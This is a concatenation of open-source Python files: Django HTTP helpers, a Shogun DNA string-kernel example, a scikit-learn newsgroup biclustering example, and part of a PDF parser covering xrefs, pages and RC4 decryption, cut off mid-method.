mdanielwork/intellij-community | python/lib/Lib/site-packages/django/utils/http.py | 69 | 4132 | import re
import urllib
from email.Utils import formatdate
from django.utils.encoding import smart_str, force_unicode
from django.utils.functional import allow_lazy
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
def urlquote(url, safe='/'):
    """
    A version of Python's urllib.quote() function that can operate on unicode
    strings. The url is first UTF-8 encoded before quoting. The returned string
    can safely be used as part of an argument to a subsequent iri_to_uri() call
    without double-quoting occurring.
    """
    return force_unicode(urllib.quote(smart_str(url), smart_str(safe)))
# Allow quoting to be applied lazily (e.g. to lazy translation strings).
urlquote = allow_lazy(urlquote, unicode)
def urlquote_plus(url, safe=''):
    """
    A version of Python's urllib.quote_plus() function that can operate on
    unicode strings. The url is first UTF-8 encoded before quoting. The
    returned string can safely be used as part of an argument to a subsequent
    iri_to_uri() call without double-quoting occurring.
    """
    return force_unicode(urllib.quote_plus(smart_str(url), smart_str(safe)))
# Allow quoting to be applied lazily (e.g. to lazy translation strings).
urlquote_plus = allow_lazy(urlquote_plus, unicode)
def urlencode(query, doseq=0):
    """
    A version of Python's urllib.urlencode() function that can operate on
    unicode strings. The parameters are first cast to UTF-8 encoded strings
    and then encoded as per normal.
    """
    # Accept either a mapping or an iterable of key/value pairs.
    if hasattr(query, 'items'):
        query = query.items()
    return urllib.urlencode(
        [(smart_str(k),
         isinstance(v, (list,tuple)) and [smart_str(i) for i in v] or smart_str(v))
            for k, v in query],
        doseq)
def cookie_date(epoch_seconds=None):
    """Format a timestamp per Netscape's cookie standard.

    Accepts a floating point number of seconds since the epoch, in UTC -
    such as that output by time.time(). If None, the current time is used.

    Returns a string of the form 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
    """
    stamp = formatdate(epoch_seconds)
    # Splice dashes into the RFC 2822 date and force the 'GMT' suffix.
    return '{0}-{1}-{2} GMT'.format(stamp[:7], stamp[8:11], stamp[12:25])
def http_date(epoch_seconds=None):
    """Format a timestamp as an RFC1123 date (HTTP RFC2616 section 3.3.1).

    Accepts a floating point number of seconds since the epoch, in UTC -
    such as that output by time.time(). If None, the current time is used.

    Returns a string of the form 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
    """
    stamp = formatdate(epoch_seconds)
    # Swap the numeric "-0000" zone for the literal 'GMT' HTTP requires.
    return stamp[:25] + ' GMT'
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
    """
    Converts a base 36 string to an ``int``. To prevent
    overconsumption of server resources, raises ``ValueError`` if the
    input is longer than 13 base36 digits (13 digits is sufficient to
    base36-encode any 64-bit integer).
    """
    # Length guard: 36**13 > 2**64, so 13 digits cover any 64-bit value.
    if len(s) > 13:
        raise ValueError("Base36 input too large")
    return int(s, 36)
def int_to_base36(i):
    """
    Converts a non-negative integer to a base36 string.

    Bug fix: the original used true-style division (``i / j``) for digit
    indexing, which breaks under ``from __future__ import division`` and
    on Python 3 (float index). This version uses divmod with floor
    division, and rejects negative input (which previously produced
    silently wrong output via negative indexing).
    """
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    if i < 0:
        raise ValueError("Negative base36 conversion input.")
    if i == 0:
        return '0'
    base36 = []
    # Peel off the least-significant base36 digit each iteration.
    while i:
        i, remainder = divmod(i, 36)
        base36.append(digits[remainder])
    return ''.join(reversed(base36))
def parse_etags(etag_str):
    """
    Parses a string with one or several etags passed in If-None-Match and
    If-Match headers by the rules in RFC 2616. Returns a list of etags
    without surrounding double quotes (") and unescaped from \<CHAR>.
    """
    etags = ETAG_MATCH.findall(etag_str)
    if not etags:
        # etag_str has wrong format, treat it as an opaque string then
        return [etag_str]
    # NOTE(review): 'string_escape' is a Python 2-only codec; this line is
    # not portable to Python 3 as written.
    etags = [e.decode('string_escape') for e in etags]
    return etags
def quote_etag(etag):
    """
    Wraps a string in double quotes, escaping contents as necessary.
    """
    escaped = etag.replace('\\', '\\\\').replace('"', '\\"')
    return '"{0}"'.format(escaped)
| apache-2.0 |
OXPHOS/shogun | examples/undocumented/python/kernel_poly_match_word_string.py | 10 | 1151 | #!/usr/bin/env python
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_dna('../data/fm_train_dna.dat')
testdat = lm.load_dna('../data/fm_test_dna.dat')
parameter_list = [[traindat,testdat,2,True,3,0,False],[traindat,testdat,2,True,3,0,False]]
def kernel_poly_match_word_string (fm_train_dna=traindat,fm_test_dna=testdat,
									degree=2,inhomogene=True,order=3,gap=0,reverse=False):
	"""Compute PolyMatchWordString kernel matrices for train/test DNA data.

	Returns a tuple (km_train, km_test, kernel).
	"""
	from shogun import PolyMatchWordStringKernel
	from shogun import StringWordFeatures, StringCharFeatures, DNA
	# Embed the raw DNA strings as overlapping k-mers (words) of length 'order'.
	charfeat=StringCharFeatures(fm_train_dna, DNA)
	feats_train=StringWordFeatures(DNA)
	feats_train.obtain_from_char(charfeat, order-1, order, gap, reverse)
	charfeat=StringCharFeatures(fm_test_dna, DNA)
	feats_test=StringWordFeatures(DNA)
	feats_test.obtain_from_char(charfeat, order-1, order, gap, reverse)
	kernel=PolyMatchWordStringKernel(feats_train, feats_train, degree, inhomogene)
	km_train=kernel.get_kernel_matrix()
	# Re-initialize against the test features to get the train/test matrix.
	kernel.init(feats_train, feats_test)
	km_test=kernel.get_kernel_matrix()
	return km_train,km_test,kernel
if __name__=='__main__':
print('PolyMatchWordString')
kernel_poly_match_word_string(*parameter_list[0])
| gpl-3.0 |
h2educ/scikit-learn | examples/bicluster/bicluster_newsgroups.py | 142 | 7183 | """
================================================================
Biclustering documents with the Spectral Co-clustering algorithm
================================================================
This example demonstrates the Spectral Co-clustering algorithm on the
twenty newsgroups dataset. The 'comp.os.ms-windows.misc' category is
excluded because it contains many posts containing nothing but data.
The TF-IDF vectorized posts form a word frequency matrix, which is
then biclustered using Dhillon's Spectral Co-Clustering algorithm. The
resulting document-word biclusters indicate subsets words used more
often in those subsets documents.
For a few of the best biclusters, its most common document categories
and its ten most important words get printed. The best biclusters are
determined by their normalized cut. The best words are determined by
comparing their sums inside and outside the bicluster.
For comparison, the documents are also clustered using
MiniBatchKMeans. The document clusters derived from the biclusters
achieve a better V-measure than clusters found by MiniBatchKMeans.
Output::
Vectorizing...
Coclustering...
Done in 9.53s. V-measure: 0.4455
MiniBatchKMeans...
Done in 12.00s. V-measure: 0.3309
Best biclusters:
----------------
bicluster 0 : 1951 documents, 4373 words
categories : 23% talk.politics.guns, 19% talk.politics.misc, 14% sci.med
words : gun, guns, geb, banks, firearms, drugs, gordon, clinton, cdt, amendment
bicluster 1 : 1165 documents, 3304 words
categories : 29% talk.politics.mideast, 26% soc.religion.christian, 25% alt.atheism
words : god, jesus, christians, atheists, kent, sin, morality, belief, resurrection, marriage
bicluster 2 : 2219 documents, 2830 words
categories : 18% comp.sys.mac.hardware, 16% comp.sys.ibm.pc.hardware, 16% comp.graphics
words : voltage, dsp, board, receiver, circuit, shipping, packages, stereo, compression, package
bicluster 3 : 1860 documents, 2745 words
categories : 26% rec.motorcycles, 23% rec.autos, 13% misc.forsale
words : bike, car, dod, engine, motorcycle, ride, honda, cars, bmw, bikes
bicluster 4 : 12 documents, 155 words
categories : 100% rec.sport.hockey
words : scorer, unassisted, reichel, semak, sweeney, kovalenko, ricci, audette, momesso, nedved
"""
from __future__ import print_function
print(__doc__)
from collections import defaultdict
import operator
import re
from time import time
import numpy as np
from sklearn.cluster.bicluster import SpectralCoclustering
from sklearn.cluster import MiniBatchKMeans
from sklearn.externals.six import iteritems
from sklearn.datasets.twenty_newsgroups import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.cluster import v_measure_score
def number_aware_tokenizer(doc):
    """Tokenize *doc*, mapping numeric-looking tokens to a placeholder.

    For many applications, tokens that begin with a number are not directly
    useful, but the fact that such a token exists can be relevant. By applying
    this form of dimensionality reduction, some methods may perform better.
    """
    words = re.findall(u'(?u)\\b\\w\\w+\\b', doc)
    return [word if word[0] not in "0123456789_" else "#NUMBER"
            for word in words]
# exclude 'comp.os.ms-windows.misc'
categories = ['alt.atheism', 'comp.graphics',
'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware',
'comp.windows.x', 'misc.forsale', 'rec.autos',
'rec.motorcycles', 'rec.sport.baseball',
'rec.sport.hockey', 'sci.crypt', 'sci.electronics',
'sci.med', 'sci.space', 'soc.religion.christian',
'talk.politics.guns', 'talk.politics.mideast',
'talk.politics.misc', 'talk.religion.misc']
newsgroups = fetch_20newsgroups(categories=categories)
y_true = newsgroups.target
vectorizer = TfidfVectorizer(stop_words='english', min_df=5,
tokenizer=number_aware_tokenizer)
cocluster = SpectralCoclustering(n_clusters=len(categories),
svd_method='arpack', random_state=0)
kmeans = MiniBatchKMeans(n_clusters=len(categories), batch_size=20000,
random_state=0)
print("Vectorizing...")
X = vectorizer.fit_transform(newsgroups.data)
print("Coclustering...")
start_time = time()
cocluster.fit(X)
y_cocluster = cocluster.row_labels_
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_cocluster, y_true)))
print("MiniBatchKMeans...")
start_time = time()
y_kmeans = kmeans.fit_predict(X)
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_kmeans, y_true)))
feature_names = vectorizer.get_feature_names()
document_names = list(newsgroups.target_names[i] for i in newsgroups.target)
def bicluster_ncut(i):
    """Normalized-cut score of bicluster *i* (lower is better).

    Reads the module-level ``cocluster`` model and TF-IDF matrix ``X``.
    Empty biclusters score the maximum float so they sort last.
    """
    rows, cols = cocluster.get_indices(i)
    if not (np.any(rows) and np.any(cols)):
        import sys
        return sys.float_info.max
    row_complement = np.nonzero(np.logical_not(cocluster.rows_[i]))[0]
    col_complement = np.nonzero(np.logical_not(cocluster.columns_[i]))[0]
    # Note: the following is identical to X[rows[:, np.newaxis], cols].sum() but
    # much faster in scipy <= 0.16
    weight = X[rows][:, cols].sum()
    cut = (X[row_complement][:, cols].sum() +
           X[rows][:, col_complement].sum())
    return cut / weight
def most_common(d):
    """Items of a defaultdict(int) with the highest values.

    Like Counter.most_common in Python >=2.7, but without a cutoff.
    Uses ``dict.items()`` directly instead of ``six.iteritems`` so it
    works identically on Python 2 and 3 (this was the only use of the
    compatibility shim in this helper).
    """
    return sorted(d.items(), key=operator.itemgetter(1), reverse=True)
bicluster_ncuts = list(bicluster_ncut(i)
for i in range(len(newsgroups.target_names)))
best_idx = np.argsort(bicluster_ncuts)[:5]
print()
print("Best biclusters:")
print("----------------")
for idx, cluster in enumerate(best_idx):
n_rows, n_cols = cocluster.get_shape(cluster)
cluster_docs, cluster_words = cocluster.get_indices(cluster)
if not len(cluster_docs) or not len(cluster_words):
continue
# categories
counter = defaultdict(int)
for i in cluster_docs:
counter[document_names[i]] += 1
cat_string = ", ".join("{:.0f}% {}".format(float(c) / n_rows * 100, name)
for name, c in most_common(counter)[:3])
# words
out_of_cluster_docs = cocluster.row_labels_ != cluster
out_of_cluster_docs = np.where(out_of_cluster_docs)[0]
word_col = X[:, cluster_words]
word_scores = np.array(word_col[cluster_docs, :].sum(axis=0) -
word_col[out_of_cluster_docs, :].sum(axis=0))
word_scores = word_scores.ravel()
important_words = list(feature_names[cluster_words[i]]
for i in word_scores.argsort()[:-11:-1])
print("bicluster {} : {} documents, {} words".format(
idx, n_rows, n_cols))
print("categories : {}".format(cat_string))
print("words : {}\n".format(', '.join(important_words)))
| bsd-3-clause |
Sri0405/pattern | pattern/web/pdf/pdfparser.py | 53 | 27593 | #!/usr/bin/env python2
import sys
import re
import struct
try:
import hashlib as md5
except ImportError:
import md5
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from psparser import PSStackParser
from psparser import PSSyntaxError, PSEOF
from psparser import literal_name
from psparser import LIT, KWD, STRICT
from pdftypes import PDFException, PDFTypeError, PDFNotImplementedError
from pdftypes import PDFStream, PDFObjRef
from pdftypes import resolve1, decipher_all
from pdftypes import int_value, float_value, num_value
from pdftypes import str_value, list_value, dict_value, stream_value
from arcfour import Arcfour
from utils import choplist, nunpack
from utils import decode_text, ObjIdRange
## Exceptions
##
class PDFSyntaxError(PDFException): pass            # malformed PDF structure
class PDFNoValidXRef(PDFSyntaxError): pass          # no usable xref section found
class PDFNoOutlines(PDFException): pass             # document has no outline tree
class PDFDestinationNotFound(PDFException): pass    # named destination missing
class PDFEncryptionError(PDFException): pass        # invalid/unsupported encryption
class PDFPasswordIncorrect(PDFEncryptionError): pass  # wrong document password
# some predefined literals and keywords.
LITERAL_OBJSTM = LIT('ObjStm')
LITERAL_XREF = LIT('XRef')
LITERAL_PAGE = LIT('Page')
LITERAL_PAGES = LIT('Pages')
LITERAL_CATALOG = LIT('Catalog')
## XRefs
##
class PDFBaseXRef(object):
    """Abstract interface shared by table- and stream-based xref sections."""
    def get_trailer(self):
        raise NotImplementedError
    def get_objids(self):
        # Iterable of object ids known to this xref (default: none).
        return []
    def get_pos(self, objid):
        # Return (strmid-or-None, position/index) for objid; KeyError if unknown.
        raise KeyError(objid)
## PDFXRef
##
class PDFXRef(PDFBaseXRef):
    """A classic (table-style) cross-reference section plus its trailer."""
    def __init__(self):
        # objid -> (generation number, byte offset of the object in the file)
        self.offsets = {}
        self.trailer = {}
        return
    def load(self, parser, debug=0):
        """Parse 'start nobjs' subsection headers and their entry lines."""
        while 1:
            try:
                (pos, line) = parser.nextline()
                if not line.strip(): continue
            except PSEOF:
                raise PDFNoValidXRef('Unexpected EOF - file corrupted?')
            if not line:
                raise PDFNoValidXRef('Premature eof: %r' % parser)
            if line.startswith('trailer'):
                # Rewind so load_trailer() re-reads the 'trailer' keyword.
                parser.seek(pos)
                break
            f = line.strip().split(' ')
            if len(f) != 2:
                raise PDFNoValidXRef('Trailer not found: %r: line=%r' % (parser, line))
            try:
                (start, nobjs) = map(long, f)
            except ValueError:
                raise PDFNoValidXRef('Invalid line: %r: line=%r' % (parser, line))
            for objid in xrange(start, start+nobjs):
                try:
                    (_, line) = parser.nextline()
                except PSEOF:
                    raise PDFNoValidXRef('Unexpected EOF - file corrupted?')
                f = line.strip().split(' ')
                if len(f) != 3:
                    raise PDFNoValidXRef('Invalid XRef format: %r, line=%r' % (parser, line))
                (pos, genno, use) = f
                # Only in-use ('n') entries are recorded; free ('f') are skipped.
                if use != 'n': continue
                self.offsets[objid] = (int(genno), long(pos))
        if 1 <= debug:
            print >>sys.stderr, 'xref objects:', self.offsets
        self.load_trailer(parser)
        return
    KEYWORD_TRAILER = KWD('trailer')
    def load_trailer(self, parser):
        """Parse the trailer dictionary that follows the xref table."""
        try:
            (_,kwd) = parser.nexttoken()
            assert kwd is self.KEYWORD_TRAILER
            (_,dic) = parser.nextobject()
        except PSEOF:
            # Fall back to whatever partial object is on the parser stack.
            x = parser.pop(1)
            if not x:
                raise PDFNoValidXRef('Unexpected EOF - file corrupted')
            (_,dic) = x[0]
        self.trailer.update(dict_value(dic))
        return
    PDFOBJ_CUE = re.compile(r'^(\d+)\s+(\d+)\s+obj\b')
    def load_fallback(self, parser, debug=0):
        """Recover by scanning the whole file for 'N M obj' markers.

        Used when no valid xref table could be located.
        """
        parser.seek(0)
        while 1:
            try:
                (pos, line) = parser.nextline()
            except PSEOF:
                break
            if line.startswith('trailer'):
                parser.seek(pos)
                self.load_trailer(parser)
                if 1 <= debug:
                    print >>sys.stderr, 'trailer: %r' % self.get_trailer()
                break
            m = self.PDFOBJ_CUE.match(line)
            if not m: continue
            (objid, genno) = m.groups()
            self.offsets[int(objid)] = (0, pos)
        return
    def get_trailer(self):
        return self.trailer
    def get_objids(self):
        return self.offsets.iterkeys()
    def get_pos(self, objid):
        try:
            (genno, pos) = self.offsets[objid]
        except KeyError:
            raise
        # Table xrefs always address top-level objects (no container stream).
        return (None, pos)
## PDFXRefStream
##
class PDFXRefStream(PDFBaseXRef):
    """A cross-reference stream (PDF 1.5+), with binary packed entries."""
    def __init__(self):
        self.data = None
        # entlen is the packed byte length of one entry (fl1+fl2+fl3).
        self.entlen = None
        self.fl1 = self.fl2 = self.fl3 = None
        self.objid_ranges = []
        return
    def __repr__(self):
        return '<PDFXRefStream: fields=%d,%d,%d>' % (self.fl1, self.fl2, self.fl3)
    def load(self, parser, debug=0):
        """Parse the 'N M obj ... stream' wrapper and decode the XRef stream."""
        (_,objid) = parser.nexttoken() # ignored
        (_,genno) = parser.nexttoken() # ignored
        (_,kwd) = parser.nexttoken()
        (_,stream) = parser.nextobject()
        if not isinstance(stream, PDFStream) or stream['Type'] is not LITERAL_XREF:
            raise PDFNoValidXRef('Invalid PDF stream spec.')
        size = stream['Size']
        # /Index defaults to a single range covering objects 0..Size-1.
        index_array = stream.get('Index', (0,size))
        if len(index_array) % 2 != 0:
            raise PDFSyntaxError('Invalid index number')
        self.objid_ranges.extend( ObjIdRange(start, nobjs)
                                  for (start,nobjs) in choplist(2, index_array) )
        (self.fl1, self.fl2, self.fl3) = stream['W']
        self.data = stream.get_data()
        self.entlen = self.fl1+self.fl2+self.fl3
        self.trailer = stream.attrs
        if 1 <= debug:
            print >>sys.stderr, ('xref stream: objid=%s, fields=%d,%d,%d' %
                                 (', '.join(map(repr, self.objid_ranges)),
                                  self.fl1, self.fl2, self.fl3))
        return
    def get_trailer(self):
        return self.trailer
    def get_objids(self):
        for objid_range in self.objid_ranges:
            for x in xrange(objid_range.get_start_id(), objid_range.get_end_id()+1):
                yield x
        return
    def get_pos(self, objid):
        """Locate objid's packed entry and decode it.

        Returns (None, byte-position) for a regular object (type 1) or
        (container-stream-id, index) for a compressed object (type 2).
        Raises KeyError for unknown or free objects.
        """
        # Translate objid into a linear entry offset across the ranges.
        offset = 0
        found = False
        for objid_range in self.objid_ranges:
            if objid >= objid_range.get_start_id() and objid <= objid_range.get_end_id():
                offset += objid - objid_range.get_start_id()
                found = True
                break
            else:
                offset += objid_range.get_nobjs()
        if not found: raise KeyError(objid)
        i = self.entlen * offset
        ent = self.data[i:i+self.entlen]
        # Field 1 defaults to 1 when zero bytes wide.
        f1 = nunpack(ent[:self.fl1], 1)
        if f1 == 1:
            pos = nunpack(ent[self.fl1:self.fl1+self.fl2])
            genno = nunpack(ent[self.fl1+self.fl2:])
            return (None, pos)
        elif f1 == 2:
            objid = nunpack(ent[self.fl1:self.fl1+self.fl2])
            index = nunpack(ent[self.fl1+self.fl2:])
            return (objid, index)
        # this is a free object
        raise KeyError(objid)
## PDFPage
##
class PDFPage(object):
    """Convenience container describing a single PDF page.

    Wraps the page attribute dictionary and exposes its common entries
    as attributes:

      doc: the owning PDFDocument object.
      pageid: any Python object that can uniquely identify the page.
      attrs: the page attribute dictionary.
      contents: list of PDFStream objects making up the page content.
      lastmod: last modified time of the page, if present.
      resources: resources used by the page.
      mediabox: the physical size of the page.
      cropbox: the crop rectangle (defaults to mediabox).
      rotate: page rotation, normalized into the 0-359 degree range.
      annots: the page annotations, if any.
      beads: article bead chain representing natural reading order.
    """
    def __init__(self, doc, pageid, attrs):
        """Build the page from its attribute dictionary.

        doc: the owning PDFDocument object.
        pageid: unique identifier for the page.
        attrs: the raw page attribute dictionary.
        """
        self.doc = doc
        self.pageid = pageid
        self.attrs = dict_value(attrs)
        self.lastmod = resolve1(self.attrs.get('LastModified'))
        self.resources = resolve1(self.attrs['Resources'])
        self.mediabox = resolve1(self.attrs['MediaBox'])
        # The crop rectangle falls back to the media box when absent.
        self.cropbox = (resolve1(self.attrs['CropBox'])
                        if 'CropBox' in self.attrs else self.mediabox)
        self.rotate = (self.attrs.get('Rotate', 0)+360) % 360
        self.annots = self.attrs.get('Annots')
        self.beads = self.attrs.get('B')
        # /Contents may be a single stream or a list; normalize to a list.
        page_contents = (resolve1(self.attrs['Contents'])
                         if 'Contents' in self.attrs else [])
        if not isinstance(page_contents, list):
            page_contents = [page_contents]
        self.contents = page_contents
        return
    def __repr__(self):
        return '<PDFPage: Resources=%r, MediaBox=%r>' % (self.resources, self.mediabox)
## PDFDocument
##
class PDFDocument(object):
    """PDFDocument object represents a PDF document.
    Since a PDF file can be very big, normally it is not loaded at
    once. So PDF document has to cooperate with a PDF parser in order to
    dynamically import the data as processing goes.
    Typical usage:
      doc = PDFDocument()
      doc.set_parser(parser)
      doc.initialize(password)
      obj = doc.getobj(objid)
    """
    debug = 0
    def __init__(self, caching=True):
        self.caching = caching     # cache fetched/parsed objects between calls
        self.xrefs = []            # xref tables/streams, newest first
        self.info = []             # /Info dicts from every trailer found
        self.catalog = None        # the /Root catalog dictionary
        self.encryption = None     # (docid, /Encrypt dict) when encrypted
        self.decipher = None       # decryption callback set by initialize()
        self._parser = None
        self._cached_objs = {}     # objid -> parsed object
        self._parsed_objs = {}     # object-stream objid -> token list
        return
    def set_parser(self, parser):
        "Set the document to use a given PDFParser object."
        if self._parser: return
        self._parser = parser
        # Retrieve the information of each header that was appended
        # (maybe multiple times) at the end of the document.
        self.xrefs = parser.read_xref()
        for xref in self.xrefs:
            trailer = xref.get_trailer()
            if not trailer: continue
            # If there's an encryption info, remember it.
            if 'Encrypt' in trailer:
                #assert not self.encryption
                self.encryption = (list_value(trailer['ID']),
                                   dict_value(trailer['Encrypt']))
            if 'Info' in trailer:
                self.info.append(dict_value(trailer['Info']))
            if 'Root' in trailer:
                # Every PDF file must have exactly one /Root dictionary.
                self.catalog = dict_value(trailer['Root'])
                break
        else:
            raise PDFSyntaxError('No /Root object! - Is this really a PDF?')
        if self.catalog.get('Type') is not LITERAL_CATALOG:
            if STRICT:
                raise PDFSyntaxError('Catalog not found!')
        return
    # initialize(password='')
    #   Perform the initialization with a given password.
    #   This step is mandatory even if there's no password associated
    #   with the document.
    # The standard 32-byte padding string of Algorithm 3.2 (PDF spec).
    PASSWORD_PADDING = '(\xbfN^Nu\x8aAd\x00NV\xff\xfa\x01\x08..\x00\xb6\xd0h>\x80/\x0c\xa9\xfedSiz'
    def initialize(self, password=''):
        """Authenticate with the standard security handler (RC4, V=1/2,
        R=2/3 only) and install self.decipher. For unencrypted documents
        this simply grants all permissions."""
        if not self.encryption:
            self.is_printable = self.is_modifiable = self.is_extractable = True
            return
        (docid, param) = self.encryption
        if literal_name(param.get('Filter')) != 'Standard':
            raise PDFEncryptionError('Unknown filter: param=%r' % param)
        V = int_value(param.get('V', 0))
        if not (V == 1 or V == 2):
            raise PDFEncryptionError('Unknown algorithm: param=%r' % param)
        length = int_value(param.get('Length', 40)) # Key length (bits)
        O = str_value(param['O'])
        R = int_value(param['R']) # Revision
        if 5 <= R:
            raise PDFEncryptionError('Unknown revision: %r' % R)
        U = str_value(param['U'])
        P = int_value(param['P'])
        # Permission bits of /P (see the spec's permissions table).
        self.is_printable = bool(P & 4)
        self.is_modifiable = bool(P & 8)
        self.is_extractable = bool(P & 16)
        # Algorithm 3.2: derive the RC4 file key from the user password.
        password = (password+self.PASSWORD_PADDING)[:32] # 1
        hash = md5.md5(password) # 2
        hash.update(O) # 3
        hash.update(struct.pack('<l', P)) # 4
        hash.update(docid[0]) # 5
        if 4 <= R:
            # 6
            raise PDFNotImplementedError('Revision 4 encryption is currently unsupported')
        if 3 <= R:
            # 8
            for _ in xrange(50):
                hash = md5.md5(hash.digest()[:length/8])
        key = hash.digest()[:length/8]
        if R == 2:
            # Algorithm 3.4
            u1 = Arcfour(key).process(self.PASSWORD_PADDING)
        elif R == 3:
            # Algorithm 3.5
            hash = md5.md5(self.PASSWORD_PADDING) # 2
            hash.update(docid[0]) # 3
            x = Arcfour(key).process(hash.digest()[:16]) # 4
            for i in xrange(1,19+1):
                k = ''.join( chr(ord(c) ^ i) for c in key )
                x = Arcfour(k).process(x)
            u1 = x+x # 32bytes total
        if R == 2:
            is_authenticated = (u1 == U)
        else:
            # Revision 3: only the first 16 bytes of /U are significant.
            is_authenticated = (u1[:16] == U[:16])
        if not is_authenticated:
            raise PDFPasswordIncorrect
        self.decrypt_key = key
        self.decipher = self.decrypt_rc4 # XXX may be AES
        return
    def decrypt_rc4(self, objid, genno, data):
        # Algorithm 3.1: per-object key = file key + low 3 bytes of objid
        # + low 2 bytes of genno, md5-hashed and truncated to 16 bytes.
        key = self.decrypt_key + struct.pack('<L',objid)[:3]+struct.pack('<L',genno)[:2]
        hash = md5.md5(key)
        key = hash.digest()[:min(len(key),16)]
        return Arcfour(key).process(data)
    KEYWORD_OBJ = KWD('obj')
    def getobj(self, objid):
        """Fetch (and cache) the object with the given id, following the
        xref either to a plain in-file object or into an object stream.
        Returns None for a nonexistent reference in non-strict mode."""
        if not self.xrefs:
            raise PDFException('PDFDocument is not initialized')
        if 2 <= self.debug:
            print >>sys.stderr, 'getobj: objid=%r' % (objid)
        if objid in self._cached_objs:
            genno = 0
            obj = self._cached_objs[objid]
        else:
            # Try each xref section, newest first.
            for xref in self.xrefs:
                try:
                    (strmid, index) = xref.get_pos(objid)
                    break
                except KeyError:
                    pass
            else:
                if STRICT:
                    raise PDFSyntaxError('Cannot locate objid=%r' % objid)
                # return null for a nonexistent reference.
                return None
            if strmid:
                # The object lives inside an object stream (PDF 1.5).
                stream = stream_value(self.getobj(strmid))
                if stream.get('Type') is not LITERAL_OBJSTM:
                    if STRICT:
                        raise PDFSyntaxError('Not a stream object: %r' % stream)
                try:
                    n = stream['N']
                except KeyError:
                    if STRICT:
                        raise PDFSyntaxError('N is not defined: %r' % stream)
                    n = 0
                if strmid in self._parsed_objs:
                    objs = self._parsed_objs[strmid]
                else:
                    # Tokenize the whole object stream once and cache it.
                    parser = PDFStreamParser(stream.get_data())
                    parser.set_document(self)
                    objs = []
                    try:
                        while 1:
                            (_,obj) = parser.nextobject()
                            objs.append(obj)
                    except PSEOF:
                        pass
                    if self.caching:
                        self._parsed_objs[strmid] = objs
                genno = 0
                # The token list starts with N (objid, offset) integer
                # pairs; the actual objects begin at index 2*N.
                i = n*2+index
                try:
                    obj = objs[i]
                except IndexError:
                    raise PDFSyntaxError('Invalid object number: objid=%r' % (objid))
                if isinstance(obj, PDFStream):
                    obj.set_objid(objid, 0)
            else:
                # Plain in-file object: seek to its offset and parse
                # 'objid genno obj <object>'.
                self._parser.seek(index)
                (_,objid1) = self._parser.nexttoken() # objid
                (_,genno) = self._parser.nexttoken() # genno
                (_,kwd) = self._parser.nexttoken()
                # #### hack around malformed pdf files
                #assert objid1 == objid, (objid, objid1)
                if objid1 != objid:
                    x = []
                    while kwd is not self.KEYWORD_OBJ:
                        (_,kwd) = self._parser.nexttoken()
                        x.append(kwd)
                    if x:
                        objid1 = x[-2]
                        genno = x[-1]
                # #### end hack around malformed pdf files
                if kwd is not self.KEYWORD_OBJ:
                    raise PDFSyntaxError('Invalid object spec: offset=%r' % index)
                try:
                    (_,obj) = self._parser.nextobject()
                    if isinstance(obj, PDFStream):
                        obj.set_objid(objid, genno)
                except PSEOF:
                    return None
            if 2 <= self.debug:
                print >>sys.stderr, 'register: objid=%r: %r' % (objid, obj)
            if self.caching:
                self._cached_objs[objid] = obj
        if self.decipher:
            obj = decipher_all(self.decipher, objid, genno, obj)
        return obj
    INHERITABLE_ATTRS = set(['Resources', 'MediaBox', 'CropBox', 'Rotate'])
    def get_pages(self):
        """Walk the page tree depth-first and yield a PDFPage for every
        leaf /Page node, propagating inheritable attributes downwards."""
        if not self.xrefs:
            raise PDFException('PDFDocument is not initialized')
        def search(obj, parent):
            # obj is either an objid (int) or a page-tree node object.
            if isinstance(obj, int):
                objid = obj
                tree = dict_value(self.getobj(objid)).copy()
            else:
                objid = obj.objid
                tree = dict_value(obj).copy()
            # Inherit attributes from the parent unless overridden here.
            for (k,v) in parent.iteritems():
                if k in self.INHERITABLE_ATTRS and k not in tree:
                    tree[k] = v
            if tree.get('Type') is LITERAL_PAGES and 'Kids' in tree:
                if 1 <= self.debug:
                    print >>sys.stderr, 'Pages: Kids=%r' % tree['Kids']
                for c in list_value(tree['Kids']):
                    for x in search(c, tree):
                        yield x
            elif tree.get('Type') is LITERAL_PAGE:
                if 1 <= self.debug:
                    print >>sys.stderr, 'Page: %r' % tree
                yield (objid, tree)
        if 'Pages' not in self.catalog: return
        for (pageid,tree) in search(self.catalog['Pages'], self.catalog):
            yield PDFPage(self, pageid, tree)
        return
    def get_outlines(self):
        """Yield (level, title, dest, action, se) for each outline
        (bookmark) entry. Raises PDFNoOutlines when the document has no
        /Outlines dictionary."""
        if 'Outlines' not in self.catalog:
            raise PDFNoOutlines
        def search(entry, level):
            entry = dict_value(entry)
            if 'Title' in entry:
                if 'A' in entry or 'Dest' in entry:
                    title = decode_text(str_value(entry['Title']))
                    dest = entry.get('Dest')
                    action = entry.get('A')
                    se = entry.get('SE')
                    yield (level, title, dest, action, se)
            if 'First' in entry and 'Last' in entry:
                # descend into children
                for x in search(entry['First'], level+1):
                    yield x
            if 'Next' in entry:
                # continue with the next sibling at the same level
                for x in search(entry['Next'], level):
                    yield x
            return
        return search(self.catalog['Outlines'], 0)
    def lookup_name(self, cat, key):
        """Resolve *key* in the name tree under /Names/<cat>.
        Raises KeyError when the tree or the key is missing."""
        try:
            names = dict_value(self.catalog['Names'])
        except (PDFTypeError, KeyError):
            raise KeyError((cat,key))
        # may raise KeyError
        d0 = dict_value(names[cat])
        def lookup(d):
            # /Limits gives the [smallest, largest] key of this subtree;
            # prune subtrees that cannot contain the key.
            if 'Limits' in d:
                (k1,k2) = list_value(d['Limits'])
                if key < k1 or k2 < key: return None
            if 'Names' in d:
                # Leaf node: flat [key1, val1, key2, val2, ...] array.
                objs = list_value(d['Names'])
                names = dict(choplist(2, objs))
                return names[key]
            if 'Kids' in d:
                for c in list_value(d['Kids']):
                    v = lookup(dict_value(c))
                    if v: return v
            raise KeyError((cat,key))
        return lookup(d0)
    def get_dest(self, name):
        """Return the destination object for the named destination."""
